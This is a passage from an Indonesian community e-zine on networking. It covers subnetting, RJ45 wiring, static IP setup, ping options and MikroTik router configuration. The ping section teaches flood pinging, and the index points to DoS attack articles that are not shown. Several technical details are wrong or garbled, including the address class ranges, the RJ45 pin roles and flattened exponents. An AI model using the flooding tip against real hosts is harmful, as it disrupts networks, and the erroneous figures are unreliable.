e zit #vol 2

70
1 e-ZIT #Vol 2 - Networking

Upload: bfhie-el

Post on 15-Aug-2015

53 views

Category:

Technology


7 download

TRANSCRIPT

Page 1: E zit #vol 2

1 e-ZIT #Vol 2 - Networking

Page 2: E zit #vol 2

2 e-ZIT #Vol 2 - Networking

Introduce

History

ZONA IT TERNATE atau di singkat dengan ZIT, berdiri pada tanggal 18 Februari 2012 adalah

suatu komunitas yang peduli akan perkembangan ilmu pengetahuan teknologi yang di buka

secara umum baik untuk mahasiswa, pelajar maupun masyaratakat umum lainya, guna

mengembangkan ilmu teknologi dan informasi dan sebagai media perkumpulan sesama

pecinta IT.

Visi

“Menjadi komunitas yang komunikatif, informatif, kreatif, humanis dan berkualitas di

tingkat Provinsi dan Nasional “

Misi

Menciptakan, menerapkan dan mengembangkan teknologi informasi yang berdaya

guna dan berhasil guna bagi masyarakat.

Mendayakan tiap komponen yang ada untuk menguasai ilmu pengetahuan dan

teknologi untuk memberikan yang terbaik bagi perkembangannya.

Mewujudkan sebuah wahana pengembangan ilmu pengetahuan dan teknologi diluar

naungan kampus maupun sekolah

Menbentuk Keluarga Besar Pecinta IT Khususnya di Ternate dan Maluku Utara pada

umumnya.

Menciptakan Komunitas yang memiliki jiwa kewirausahaan dan Berdaya saing

Motto

Learn, Explore, Action, Share

Page 3: E zit #vol 2

3 e-ZIT #Vol 2 - Networking

Kata Pengantar

Puji syukur kami panjatkan ke hadirat Tuhan YME karena kasih setia dan pertolonganNya hingga kami dapat menyelesaikan buku ini walaupun agak lama jarak terbitnya dari e-ZIT Vol pertama. Di e-ZIT Vol 2 ini kami membahas mengenai Networking dan apa saja yang terkait di dalamnya, mulai dari langkah-langkah awal untuk menjadi seorang networker, basic networking dan beberapa tips n tricks yang juga masih di seputar dunia netrworking. Semoga di e-ZIT Vol 2 ini dapat membantu, dan menambah pengetahuan teman-teman mengenai dunia Netwroking. Dan kami mohon maaf apabila terdapat banyak kekurangan di e-ZIT vol 2 ini. Semua yang tercantum di dalam e-ZIT ini adalah hasil experiment, searching di internet dan Thread di forum codernate. Akhir kata, kami sampaikan terimakasih kepada semua pihak yang telah berperan dalam penyusunan e-ZIT ini dari awal sampai akhir.

Selamat membaca…

Salam

Team Readksi & All Staff Zona IT Ternate

Page 4: E zit #vol 2

4 e-ZIT #Vol 2 - Networking

Index

Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus

Saya Pelajari ? #5

Cara Cepat Mengitung IP Address & Subnetting #7

Cara Konfigurasi RJ45 [Pengkabelan] #12

Setting IP Static di Backtrack/Ubuntu #17

Beragam Tips Perintah Ping #20

Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address

dan NAT #22

Mikrotik > Management Bandwith Berdasarkan Extensi #24

Mikrotik > Cara Sederhana Membuat Hotspot #32

Mikrotik > Pisah Download, Browse & Game di 1 Line #33

Mikrotik > Leases Static DHCP #36

Network Scanning With NMAP #37

Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G #40

Security > Mencegah Serangan Ping Flooding Dengan Iptables #46

Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip #48

Security > Apa Itu Honeypot ? #50

Network Attack > DoS Attack With Metasploit #57

Network Attack > POC Samsung Smart TV Denial of Service (DoS) Attack

#62

Network Attack > How To Use Xerxes DDoS Tools #65

ZIT Product & Info #67

- Codernate Linux 1.4 (Dodorobe) Released!!!

Credits #69

- Cara Kirim Artikel Di e-ZIT edisi berikutnya

- Redaksi

- Grets

Home Page #70

Page 5: E zit #vol 2

5 e-ZIT #Vol 2 - Networking

Apa Tujuanmu Menjadi Seorang Networker/SysAdmin ? Apa Yang Harus

Saya Pelajari ?

Yups, akhirnya setelah 2 bulan vacum, ketemu lagi deh sama e-ZIT Vol 2, hehehe

Nah, karena di Vol 2 temanya mengenai Networking, kali ini e-ZIT mau berbagi sedikit tips

seputar Kaka-kaka yang pengen menggeluti dunia Networking,, iya Networking, iya bener,

#halah okeh lanjut..

Bagi kaka-kaka yang bercita-cita menjadi seorang SysAdmin a.k.a Networker atau pengen

mengenal lebih dalam, lebih dekat, lebih, jauh dan lebih-lebih lainnya mengenai dunia

Networking, pasti akan berpikir, kira-kira Saya harus mulai dari mana dulu yah ? atau

mungkin bertanya-tanya, apa yang harus Saya pelajari duluan yah? Dan masih banyak

pertanyaan-pertanyaan lainnya..

Nah disini e-ZIT mau bagi sedikit tips neh, yang telah e-ZIT rangkum dari hasil wawancara

dengan teman-teman ZIT, googling dan maen-maen di forum tetangga,,, hehehe

Yups, tho the point saja,,, neh :

1. Basic IP dan Subnetting

Mungkin kalau bisa dibilang yang sangat penting dari semua-nya adalah IP dan

subnetting. Hal ini akan sangat terasa apabila Anda bekerja di ISP. Anda akan

mempelajari cara efisiensi IP,apa itu gateway? Bagaimana mengatur IP yang baik, dll

2. Basic Hardware Networking

Kenapa mesti dipelajari?? Karena dari sinilah inti perjalanan packet yang akan dikirim

dari komputer kita ke Server. Apa itu Switch, Hub, Wireless. Taukah Anda bahwa switch

lebih aman daripada WIFI?? Kapan saya menggunakan switch atau Wifi. Semua harus

diperhitungkan dengan baik. Darimana kita belajar? Banyak buku yang mempelajari hal

tersebut

3. Technology Switching dan Routing

Kalau Anda sudah melebihi 1 jaringan di kantor Anda harus bisa melakukan routing

terhadap jaringan. Tau tidak bahwa internet bisa terhubung ke mana-mana karena

routing ini. Untuk switching Anda perlu mempelajari Teknologi VLAN dll.

4. Linux

Loh, loh, loh, linux lagi, linux lagi, kenapa mesti linux ? kenapa nggak windows saja ?

Page 6: E zit #vol 2

6 e-ZIT #Vol 2 - Networking

Hahaha, yah begitulah, disamping Linux lebih stabil untuk Networking, kebanyakan OS

server-server yang di pakai sekarang yah Linux, karena Linux emang cocok untuk

Networking, lebih aman dari windows juga dan masih banyak manfaat dan kelebihan

Linux untuk keperluan lainnya, bisa di bilang anak Networking, seorang SysAdmin atau

Networker itu harus familiar sama OS yang satu ini…

5. Technology Server

Kalau yang satu ini Anda akan banyak berhubungan dengan Server LDAP, DHCP, DNS, Dll.

Intinya adalah memberikan service yang dibutuhkan untuk client. Untuk mencari

informasi silahkan minta bantuan Google. Ketikkan service server yang ingin dipelajari

6. Security

Nah setelah terbentuk server dan infrastruktur yang baik barulah Anda memperhatikan

Security mulai dari Server, Router, sampai Anda membuat IDS untuk mendeteksi

serangan

7. Monitoring

Monitoring ini mencangkup semua hal baik dari infrastruktur maupun dari sisi Server.

Semakin baik monitoring maka Anda akan mudah..

8. Backup

Hal ini sering dilupakan oleh para Network Administrator. Lakukan Backup Deferensial

maupun Full untuk mengantisipasi Crash. Banyak teknologi yang dilakukan. Kalau saya

lebih sering menggunakan RAID untuk Backup Harddisk dan Rsync untuk FIle

Darimana Kaka bisa mempelajari hal-hal tersebut:

1. Dari Google yang pasti nya

2. Buku atau Ebook

3. Tutorial

4. Forum

5. Pengalaman dan TroubleShooting terhadap suatu masalah

Yarp, mungkin itu saja sedikit tips yang bias e-ZIT berikan di kesempatan kali ini, apabila

teman-teman punya saran yang lainnya jangan lupa di share juga yah

./regards

e-ZIT

Page 7: E zit #vol 2

7 e-ZIT #Vol 2 - Networking

Cara Cepat Mengitung IP Address & Subnetting

IP Address merupakan alat yang digunakan agar paket data dapat mencapai tujuan. Di

dalam Jaringan, pengiriman suatu paket data membutuhkan alamat sebagai identitas suatu

Data akan dikirimkan (Destination Address) dan berasal (Source Address).

Agar unik setiap computer yang terkoneksi ke Internet diberi alamat yang berbeda. Alamat

ini supaya seragam seluruh dunia maka pemberian alamat IP address diseluruh dunia

diberikan oleh badan internasional Internet Assigned Number Authority (IANA), dimana

IANA hanya memberikan IP address Network ID nya saja sedangkan host ID diatur oleh

pemilik IP address tersebut. Contoh IP address untuk cisco.com adalah 202.93.35.9 untuk

http://www.ilkom.unsri.ac.id dengan IP nya 202.39.35.9

http://www.freeimagehosting.net/nptte

Ip address dibagi menjadi 2 bagian yaitu Network ID dan Host ID, Network ID yang akan

menentukan alamat dalam jaringan (network address), sedangkan Host ID menentukan

alamat dari peralatan jaringan yang sifatnya unik untuk membedakan antara satu mesin

dengan mesin lainnya. Ibaratkan Network ID Nomor jalan dan alamat jalan sedangkan Host

ID adalah nomor rumahnya.

IP address dibagi menjadi kelas yaitu ;

1. Kelas A ( 1-126)

2. Kelas B ( 128 – 192)

3. Kelas C ( 192 – 223)

4. Kelas D (224 – 239)

5. Kelas E (240 – 255)

IP Address Private & Public

Jumlah IP Address sangat terbatas, apalagi jika harus memberikan alamat semua host di

Jaringan Local Area Network (LAN). Sehingga perlu dilakukan efisiensi dalam penggunaan IP

Address. Konsep subnetting IP Address merupakan teknik yang umum digunakan di Jaringan

Internet untuk efisiensi alokasi IP Address dalam sebuah jaringan. Selain Konsep Subnetting,

cara lain adalah dengan mengalokasikan beberapa IP Address khusus yang digunakan untuk

lingkungan LAN dikenal dengan IP Private. Sedangkan IP Address yang dapat dikenal di

Internet dikenal dengan IP Public.

IP Private antara lain adalah :

ß Class A: 10.0.0.0/8

ß Class B: 172.16.0.0/16 s/d 172.31.0.0/15

ß Class C: 192.168.0.0/24 s/d 192.168.255.0/24

Page 8: E zit #vol 2

8 e-ZIT #Vol 2 - Networking

Penghitungan Subnetting

Pada hakekatnya semua pertanyaan tentang subnetting akan berkisar di empat masalah:

Jumlah Subnet, Jumlah Host per Subnet, Blok Subnet, dan Alamat Host- Broadcast.

Penulisan IP address umumnya adalah dengan 192.168.1.2. Namun adakalanya ditulis

dengan 192.168.1.2/24, apa ini artinya? Artinya bahwa IP address 192.168.1.2 dengan

subnet mask 255.255.255.0. Lho kok bisa seperti itu? Ya, /24 diambil dari penghitungan

bahwa 24 bit subnet mask diselubung dengan binari 1. Atau dengan kata lain, subnet

masknya adalah: 11111111.11111111.11111111.00000000 (255.255.255.0). Konsep ini yang

disebut dengan CIDR (Classless Inter-Domain Routing) yang diperkenalkan pertama kali

tahun 1992 oleh IEFT.

http://www.freeimagehosting.net/tovgc

SUBNETTING PADA IP ADDRESS CLASS C

Ok, sekarang mari langsung latihan saja. Subnetting seperti apa yang terjadi dengan sebuah

NETWORK ADDRESS 192.168.1.0/26 ?

Analisa: 192.168.1.0 berarti kelas C dengan Subnet Mask /26 berarti

11111111.11111111.11111111.11000000 (255.255.255.192).

Penghitungan: Seperti sudah saya sebutkan sebelumnya semua pertanyaan tentang

subnetting akan berpusat di 4 hal, jumlah subnet, jumlah host per subnet, blok subnet,

alamat host dan broadcast yang valid. Jadi kita selesaikan dengan urutan seperti itu:

1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada oktet terakhir subnet

mask (2 oktet terakhir untuk kelas B, dan 3 oktet terakhir untuk kelas A). Jadi Jumlah

Subnet adalah 22 = 4 subnet

2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu

banyaknya binari 0 pada oktet terakhir subnet. Jadi jumlah host per subnet adalah

26 - 2 = 62 host

3. Blok Subnet = 256 - 192 (nilai oktet terakhir subnet mask) = 64. Subnet berikutnya

adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128,

192.

4. Bagaimana dengan alamat host dan broadcast yang valid? Kita langsung buat

tabelnya. Sebagai catatan, host pertama adalah 1 angka setelah subnet, dan

broadcast adalah 1 angka sebelum subnet berikutnya.

http://www.freeimagehosting.net/jgix4

Page 9: E zit #vol 2

9 e-ZIT #Vol 2 - Networking

SUBNETTING PADA IP ADDRESS CLASS B

Berikutnya kita akan mencoba melakukan subnetting untuk IP address class B. Pertama,

subnet mask yang bisa digunakan untuk subnetting class B adalah seperti dibawah. Sengaja

saya pisahkan jadi dua, blok sebelah kiri dan kanan karena masing-masing berbeda teknik

terutama untuk oktet yang “dimainkan” berdasarkan blok subnetnya. CIDR /17 sampai /24

caranya sama persis dengan subnetting Class C, hanya blok subnetnya kita masukkan

langsung ke oktet ketiga, bukan seperti Class C yang “dimainkan” di oktet keempat.

Sedangkan CIDR /25 sampai /30 (kelipatan) blok subnet kita “mainkan” di oktet keempat,

tapi setelah selesai oktet ketiga berjalan maju (coeunter) dari 0, 1, 2, 3, dst.

http://www.freeimagehosting.net/wyove

Ok, kita coba dua soal untuk kedua teknik subnetting untuk Class B. Kita mulai dari yang

menggunakan subnetmask dengan CIDR /17 sampai /24. Contoh network address

172.16.0.0/18.

Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /18 berarti

11111111.11111111.11000000.00000000 (255.255.192.0).

Penghitungan:

1. Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada 2 oktet terakhir. Jadi

Jumlah Subnet adalah 22 = 4 subnet

2. Jumlah Host per Subnet = 2y - 2, dimana y adalah adalah kebalikan dari x yaitu

banyaknya binari 0 pada 2 oktet terakhir. Jadi jumlah host per subnet adalah 214 - 2

= 16.382 host

3. Blok Subnet = 256 - 192 = 64. Subnet berikutnya adalah 64 + 64 = 128, dan

128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192.

4. Alamat host dan broadcast yang valid?

http://www.freeimagehosting.net/t12dy

Berikutnya kita coba satu lagi untuk Class B khususnya untuk yang menggunakan

subnetmask CIDR /25 sampai /30. Contoh network address 172.16.0.0/25. Analisa:

172.16.0.0 berarti kelas B, dengan Subnet Mask /25 berarti

11111111.11111111.11111111.10000000 (255.255.255.128).

Penghitungan:

1. Jumlah Subnet = 29 = 512 subnet

2. Jumlah Host per Subnet = 27 - 2 = 126 host

3. Blok Subnet = 256 - 128 = 128. Jadi lengkapnya adalah (0, 128)

4. Alamat host dan broadcast yang valid?

http://www.freeimagehosting.net/sa19j

Page 10: E zit #vol 2

10 e-ZIT #Vol 2 - Networking

SUBNETTING PADA IP ADDRESS CLASS A

Kalau sudah mantab dan paham, kita lanjut ke Class A. Konsepnya semua sama saja.

Perbedaannya adalah di OKTET mana kita mainkan blok subnet. Kalau Class C di oktet ke 4

(terakhir), kelas B di Oktet 3 dan 4 (2 oktet terakhir), kalau Class A di oktet 2, 3 dan 4 (3

oktet terakhir). Kemudian subnet mask yang bisa digunakan untuk subnetting class A adalah

semua subnet mask dari CIDR /8 sampai /30.

Kita coba latihan untuk network address 10.0.0.0/16.

Analisa: 10.0.0.0 berarti kelas A, dengan Subnet Mask /16 berarti

11111111.11111111.00000000.00000000 (255.255.0.0).

Penghitungan:

1. Jumlah Subnet = 28 = 256 subnet

2. Jumlah Host per Subnet = 216 - 2 = 65534 host

3. Blok Subnet = 256 - 255 = 1. Jadi subnet lengkapnya: 0,1,2,3,4, etc.

4. Alamat host dan broadcast yang valid?

http://www.freeimagehosting.net/c6pj3

Catatan: Semua penghitungan subnet diatas berasumsikan bahwa IP Subnet-Zeroes (dan IP

Subnet-Ones) dihitung secara default. Buku versi terbaru Todd Lamle dan juga CCNA setelah

2005 sudah mengakomodasi masalah IP Subnet-Zeroes (dan IP Subnet-Ones) ini. CCNA pre-

2005 tidak memasukkannya secara default (meskipun di kenyataan kita bisa

mengaktifkannya dengan command ip subnet-zeroes), sehingga mungkin dalam beberapa

buku tentang CCNA serta soal-soal test CNAP, anda masih menemukan rumus penghitungan

Jumlah Subnet = 2x – 2

Tujuan Subnetting:

ß Menghemat penggunaan IP Public.

ß Mengurangi tingkat kongesti (kemacetan) komunikasi data didalam Jaringan.

ß Mengatasi perbedaan hardware dan media fisik yang digunakan dalam suatu network.

ß Memecah Broadcast Domain.

Proses subnetting adalah “memindahkan” atau menggeser garis pemisah antara bagian

network dan bagian host darisuatu IP Address.

Page 11: E zit #vol 2

11 e-ZIT #Vol 2 - Networking

Beberapa bit dari bagian host-ID dialokasikan menjadi bit tambahan pada bagian network-

ID. Network Address pada satu Jaringan Tunggal dipecah menjadi beberapa subnetwork.

Proses Subnetting dapat membuat sejumlah network tambahan dengan mengurangi jumlah

maksimum host yang ada dalam tiap network tersebut.....

Semoga bermanfaat ya..... :)

ket : tabel subnetting >> http://4.bp.blogspot.com/_rQYEfq496fE/TM...ting_c.png

special thank : http://bakirmuhammad2711.blogspot.com/

./regards

shockw4v3

Page 12: E zit #vol 2

12 e-ZIT #Vol 2 - Networking

Cara Konfigurasi RJ45 [Pengkabelan]

Assalamuallaikum wr...wb

Hallo sahabatku. Ini mungkin artikel pertama saya di forum.codernate.org. basic sih, tapi

apa salahnya di share… wkwkwk

Nah kali ini saya akan share tentang cara konfigurasi kabel RJ 45. Sedikit cerita tentang

pengalaman saya, ceritanya waktu itu lagi dapat tugas kampus. Tugasnya tentang cara

membuat dan mengenali kabel RJ45 tersebut, dan saya yang notabenenya masih newbie

didunia IT, masih kebingungan membedakan susunan alias cara konfigurasi kabel tersebut..

OK ini OOT..

Sedikit penjelasan, Berdasarkan media transmisi, dalam jaringan terbagi menjadi 2, yaitu:

Jaringan berkabel ( wired Network )

Jaringan Nirkabel ( wirelles Network )

Dan menurut pengalaman dan yang saya tau, dalam media transmisi jaringan dalam hal ini

pada kabelnya, ada terdapat 3 buah kabel sebgai medianya, yaitu:

1. Fiber optik ( FO )

2. Coaxial

3. RJ45

Tentunya para sahabat” yang sudah berkecimpung di dunia IT sudah pada paham kan

tentang Transmisi yang saya sisipkan di atas dan pengertianya serta perkembangannya,,,

Ok langsung saja kita kembali ke topik permasalahan yaitu dimana kita akan membahas

tentang RJ 45.

Yang saya mau bahas kali ini mengenai kabel RJ 45 sedikit gambaran tentang pemahaman

kabel RJ 45 tersebut yaitu memiliki 8 pin dan ke delapan pin tersebut sudah mempunyai

tugas tersendiri yang di rinci atau di bagi 2 yaitu empat nya untuk data dan empatnya lagi

untuk daya, antara lain yaitu :

1236 > Untuk Data

4578 > Untuk Daya

Page 13: E zit #vol 2

13 e-ZIT #Vol 2 - Networking

Nah masih bingung ya,,ok langsung saja pada poin di bawah ini...!!!

#Stright

Susunan Stright

Titik A Titik B

Putih orange > Putih orange

Orange > Orange

Putih hijau > Putih hijau

Biru > Biru

Putih biru > Putih biru

Hijau > Hijau

Putih coklat > Putih coklat

Coklat > Coklat

Nah seperti yang teman-teman lihat pada gambar di atas, susunan kabel pada pin yang

tertancap di konektor sudah sesuai dengan warna-warna yang telah ditetapkan tadi. Nah

tipe diatas ialah tipe straight, dimana susunan warna kabel pada titik A dan titik B tetap

sama posisi dan letaknya. hehehhee masih bingung ya...!!!

Page 14: E zit #vol 2

14 e-ZIT #Vol 2 - Networking

Ok saya akan contohkan seperti gambar berikut ini

Semoga pada tahap ini sobat sudah mulai paham…

Page 15: E zit #vol 2

15 e-ZIT #Vol 2 - Networking

#Cross

Susunan Cross

Titik A Titik B

Putih orange > Putih Hijau

Orange > Hijau

Putih hijau > Putih Orange

Biru > Biru

Putih biru > Putih biru

Hijau > Orange

Putih coklat > Putih coklat

Coklat > Coklat

Nah ini nih yang mereka sebut susunan cross, dimana susunan warna kabel pada Titik A dan

Titik B sudah berbeda satu sama lain, dan bagian yang diwarnai itu [Titik B] adalah pada

ujung kabel yang satunya, jika pada stright, susunan warna kedua kabel sama posisinya, nah

pada cross ujung yang satunya seperti stright sedangkan yang satunya lagi susunannya

seperti keterangan diatas.. kira-kira begitu cara konfigurasi susunan kabel RJ45 yang saya

ketahui.

Page 16: E zit #vol 2

16 e-ZIT #Vol 2 - Networking

Sekian. mungkin itu saja sedikit pengalaman saya tentang konfigurasi RJ45. Maaf jika masih

terdapat banyak kekurangan atau kesalahan pada artikel saya…

Wasallam.

Thank’s buat yang sudah baca atau ikut petunjuk saya,,,!!!

./Regards

Surtua

Page 17: E zit #vol 2

17 e-ZIT #Vol 2 - Networking

Setting IP Static di Backtrack/Ubuntu

Salam Backtrackers Bifi Ada Lagi, kali ini ane mw share cara setting ip static di

backtrack/ubuntu.. letz rock

Cara Pertama

Open Terminal Lalu Ketik comand ini

Code: nano /etc/network/interfaces

Nah setelah nano editor terbuka maka akan

muncul kayak gini

Code: auto lo

iface lo inet loopback

-------------------------------------

auto eth0

iface eth0 inet dhcp

address

network < edit di bagian ini

broadcast

netmask

gateway

-------------------------------------

auto ath0

iface ath0 inet dhcp

auto wlan0

iface wlan0 inet dhcp

disitu ada beberapa interfaces seperti eth1,eth2,eth0 dll

lalu cari interface eth0

kemudian ganti iface eth0 inet dhcp menjadi static

masukan address, network, broadcast, netmask n gateway

contoh aja

Code: auto eth0

iface eth0 inet static

address 10.20.30.2

network 10.20.30.0

broadcast 10.20.30.7

netmask 255.255.255.248

gateway 10.20.30.2

Page 18: E zit #vol 2

18 e-ZIT #Vol 2 - Networking

setelah itu di ctrl+x untuk save..

Jangan lupa setting dnsnya di sini

Code: nano /etc/resolv.conf

ntar di nano editornya ketik saja dns

kali ini ane make mbah gugel

kayak gini

Code: nameserver 8.8.8.8

nameserver 8.8.4.4

Page 19: E zit #vol 2

19 e-ZIT #Vol 2 - Networking

Cara Kedua

Masih Di Terminal

ketik comand berikut secara bertahap

Code: root@bt~# ifconfig eth0 10.20.30.2/24

root@bt~# route add default gw 10.20.30.2

root@bt~# echo nameserver 8.8.8.8 > /etc/resolv.conf

Lalu restart interfacenya

Code: /etc/init.d/networking restart

nah kalo udah di restart networknya

ketik ifconfig untuk mngecek apakah ipnya berubah seperti yang di setting tadi ataw tidak...

Kalo Belum berubah, silahkan di ulangi langkah di atas....

nb :

ketik saja comand berikut

Code: update-rc.d networking defaults

agar settingannya dapat terload ketika terestart...

setelah itu restart backtrack anda..

untuk lebih detail tentang apa itu address, network, broadcast, netmask n gateway, silahkan

tnya di gugel....

YUps, sekian tutor saya menganai setting ip static di backtrack/ubuntu...

next time ane share lagi tentang cara buat DNS Server...

Referensi > http://www.google.com

./regards

Bifi

Page 20: E zit #vol 2

20 e-ZIT #Vol 2 - Networking

Beragam Tips Perintah Ping

Baris perintah ini sangat penting untuk kita gunakan. Apalagi jika menyangkut dengan

komunikasi antar jaringan,, ya inilah baris perintah ping. “Ping merupakan salah satu

program yang digunakan untuk mengecek komunikasi antar komputer dalam sebuah

jaringan melalui protocol TCP/IP”. ping akan mengirimkan internet control message protocol

(ICMP) Echo Request messages pada IP address komputer yang di tuju dan meminta respon

dari komputer tersebut. Jika komputer target memberikan respon, komputer tersebut

memberikan informasi seperti contoh hasil ping report dibawah ini :

Beragam Tips Perintah Ping :

1. Menambah/mengurangi interval waktu antara paket.

Secara default, ping menunggu 1 detik sebelum mengirim paket berikutnya. denagan opsi -i,

anda dapat menambah atau mengurangi interval tersebut

contoh : tungu 5 detik sebelum mengirim paket berikutnya dan tunggu 0,1 detik sebelum

mengirim paket berikutnya.

Code: #ping -i 5 192.168.0.28

#ping -i 0.1 192.168.0.28

2. Periksa antarmuka jaringan lokal : Up dan Running.

Sebelum memesiksa apakah mesin peer terjangkau, cek dahulu apakah jaringan lokal adalah

Up dan Running menggunakan salah satu dari tiga metode berikut : Ping localhost

menggunakan nol (0), nama, dan IP address.

Code: #ping 0

#ping localhost

#ping 127.0.0.1

3. Mengirim paket N dan STOP

Mengirim paket N ditentukan dengan opsi -c dan kemudian stop atau keluar secara

otomatis (tanpa harus menekan CTRL+C untuk keluar).

contoh : perintah ping mengirim 5 paketdan menunggu respon dari host tujuan. anda juga

dapat mengunakan opsi -w untuk menspesifikasikan batas waktu mengirim output ping.

Code: #ping -c google.com

#ping -w 5 google.com

Page 21: E zit #vol 2

21 e-ZIT #Vol 2 - Networking

4. Flood the Network

Superuser dapat mengirim seratusatau lebih paket per detik menggunakan opsi -f. ini

mencetak'.' ketika sebuah paket dikirimkan.

contoh : ping -f telah mengirimkan lebih dari 400.000 paket dalam beberapa detik.

Code: #ping -f localhost

PING localhost.localadmin (127.0.0.1) 56(84) bytes of data. .^C 427412

packets transmitted, 427412 received,

ada yang mau tambahin perintah lain pada ping...

silahkan

spesial thanks : http://www.gudasi.com/

./regards

shockw4v3

Page 22: E zit #vol 2

22 e-ZIT #Vol 2 - Networking

Mikrotik > Memberi Nama, Merubah Nama Interface, Setting IP Address

dan NAT

Akses mikrotik:

1. via console

Mikrotik router board ataupun PC dapat diakses langsung via console/ shell maupun remote

akses menggunakan putty.

2. via winbox

Mikrotik bisa juga diakses/remote menggunakan software tool winbox.

3. via web

Mikrotik juga dapat diakses via web/port 80 dengan menggunakan browser.

Memberi Nama Mikrotik

Code: [admin@Feenx_O] > system identity print

name: "Mikrotik"

[ropix@Feenx_O] > system identity edit

value-name: name

masuk ke editor ketik misal saya ganti dengan nama Feenx_O:

Feenx_O

C-c quit C-o save&quit C-u undo C-k cut line C-y paste

Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor

Mengganti Nama Interface

Code: [admin@Feenx_O] > /interface print

Flags: X - disabled, D - dynamic, R - running

# NAME TYPE RX-RATE TX-RATE MTU

0 R ether1 ether 0 0 1500

1 R ether2 ether 0 0 1500

[admin@Feenx_O] > /interface edit 0

value-name: name

Nilai 0 adalah nilai ether1, jika ingin mengganti ethet2 nilai 0 diganti dengan 1.

masuk ke editor ketik missal saya ganti dengan nama LAN:

LAN

C-c quit C-o save&quit C-u undo C-k cut line C-y paste

Edit kemudian tekan Cltr-o untuk menyimpan dan keluar dari editor

Page 23: E zit #vol 2

23 e-ZIT #Vol 2 - Networking

Lakukan hal yang sama untuk interface ether 2, sehingga jika dilihat lagi akan muncul seperti

ini:

[admin@Feenx_O] > /interface print

Flags: X - disabled, D - dynamic, R - running

# NAME TYPE RX-RATE TX-RATE MTU

0 R LAN ether 0 0 1500

1 R Hotspot ether 0 0 1500

setting ip address

Code: [admin@Feenx_O] > /ip address add

address: 192.168.1.1/24

interface: LAN

[admin@Feenx_O] > /ip address print

Flags: X - disabled, I - invalid, D - dynamic

# ADDRESS NETWORK BROADCAST INTERFACE

0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN

Masukkan IP addres value pada kolom address beserta netmask, masukkan nama interface

yg ingin diberikan ip addressnya.Untuk Interface ke-2 yaitu interface hotspot, caranya sama

dengan diatas, sehingga jika dilihat lagi akan menjadi 2 interface:

[admin@Feenx_O] > /ip address print

Flags: X - disabled, I - invalid, D - dynamic

# ADDRESS NETWORK BROADCAST INTERFACE

0 192.168.0.254/24 192.168.0.0 192.168.0.255 LAN

1 202.51.192.42/29 202.51.192.40 202.51.192.47 Hotspot

NAT

Code: [admin@Feenx_O] > /ip firewall nat add chain=srcnat action=masquerade out-

interface=LAN

Catatan : dalam tutorial ini... saya mengakses mikrotik menggunakan winbox, dan membuat

settingan didalam mikrotik menggunakan fitur "new terminal" yang ada didalam winbox.

./regards

Feenx_O

Page 24: E zit #vol 2

24 e-ZIT #Vol 2 - Networking

Mikrotik > Management Bandwith Berdasarkan Extensi

Ok waktunya ber experiment. Disini kita mencoba melimit bandwith berdasarkan extensi

Ok langsung saja, sory kalau tulisannya rada kacau

1. buat layer7 nya, sedikit tentang layer 7 ( layer aplication) Layer Application adalah

penghubung utama antara aplikasi yang berjalan pada satu komputer dan resources

network yang membutuhkan akses padanya. Layer Application adalah layer dimana

user akan beroperasi padanya, protocol seperti FTP, telnet, SMTP, HTTP, POP3

berada pada layer Application untuk pengaplikasiannya, pastekan sript dibawah ini

ke terminal mikrotik :

Code: /ip firewall layer7-protocol add name=http-video

regexp="http/(0\.9|1\.0|1\.1)[\x09-\x0d ][1-5][0-9][0-9][\x09-\x0d -

~]*(content-type: video)

/ip firewall layer7-protocol add comment="" name="Extension \" .exe \""

regexp="\\.(exe)"

/ip firewall layer7-protocol add comment="" name="Extension \" .rar \""

regexp="\\.(rar)"

/ip firewall layer7-protocol add comment="" name="Extension \" .zip \""

regexp="\\.(zip)"

/ip firewall layer7-protocol add comment="" name="Extension \" .7z \""

regexp="\\.(7z)"

/ip firewall layer7-protocol add comment="" name="Extension \" .cab \""

regexp="\\.(cab)"

/ip firewall layer7-protocol add comment="" name="Extension \" .asf \""

regexp="\\.(asf)"

/ip firewall layer7-protocol add comment="" name="Extension \" .mov \""

regexp="\\.(mov)"

/ip firewall layer7-protocol add comment="" name="Extension \" .wmv \""

regexp="\\.(wmv)"

/ip firewall layer7-protocol add comment="" name="Extension \" .mpg \""

regexp="\\.(mpg)"

/ip firewall layer7-protocol add comment="" name="Extension \" .mpeg \""

regexp="\\.(mpeg)"

/ip firewall layer7-protocol add comment="" name="Extension \" .mkv \""

regexp="\\.(mkv)"

/ip firewall layer7-protocol add comment="" name="Extension \" .avi \""

regexp="\\.(avi)"

/ip firewall layer7-protocol add comment="" name="Extension \" .flv \""

regexp="\\.(flv)"

/ip firewall layer7-protocol add comment="" name="Extension \" .wav \""

regexp="\\.(wav)"

/ip firewall layer7-protocol add comment="" name="Extension \" .rm \""

regexp="\\.(rm)"

Page 25: E zit #vol 2

25 e-ZIT #Vol 2 - Networking

/ip firewall layer7-protocol add comment="" name="Extension \" .mp3 \""

regexp="\\.(mp3)"

/ip firewall layer7-protocol add comment="" name="Extension \" .mp4 \""

regexp="\\.(mp4)"

/ip firewall layer7-protocol add comment="" name="Extension \" .ram \""

regexp="\\.(ram)"

/ip firewall layer7-protocol add comment="" name="Extension \" .rmvb \""

regexp="\\.(rmvb)"

/ip firewall layer7-protocol add comment="" name="Extension \" .dat \""

regexp="\\.(dat)"

/ip firewall layer7-protocol add comment="" name="Extension \" .daa \""

regexp="\\.(daa)"

/ip firewall layer7-protocol add comment="" name="Extension \" .iso \""

regexp="\\.(iso)"

/ip firewall layer7-protocol add comment="" name="Extension \" .nrg \""

regexp="\\.(nrg)"

/ip firewall layer7-protocol add comment="" name="Extension \" .bin \""

regexp="\\.(bin)"

/ip firewall layer7-protocol add comment="" name="Extension \" .vcd \""

regexp=\\.(vcd)"

2. setelah kita membuat layer7, selanjutnya kita membuat mangle. Ok sedikit tentang

apa itu mangle, Mangle adalah semacam 'penanda' yang menandai paket untuk

